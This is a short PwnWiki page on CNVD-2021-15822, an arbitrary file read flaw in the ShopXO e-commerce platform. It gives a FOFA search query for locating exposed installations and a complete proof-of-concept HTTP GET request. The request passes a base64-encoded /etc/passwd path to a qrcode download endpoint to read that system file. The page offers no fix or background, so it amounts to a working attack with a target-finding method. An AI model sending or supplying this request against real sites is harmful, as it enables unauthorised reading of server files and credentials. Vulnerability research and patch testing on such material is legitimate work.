CNVD-2021-15822 ShopXO 任意文件讀取漏洞

From PwnWiki
Revision as of 10:17, 22 May 2021 by Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="ShopXO企业级B2C电商系统提供商" </pre> ==POC== <pre> GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: User-Age...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

FOFA

app="ShopXO企业级B2C电商系统提供商"

POC

GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Retrieved from "https://pwnwiki.com/index.php?title=CNVD-2021-15822_ShopXO_任意文件讀取漏洞&oldid=3033"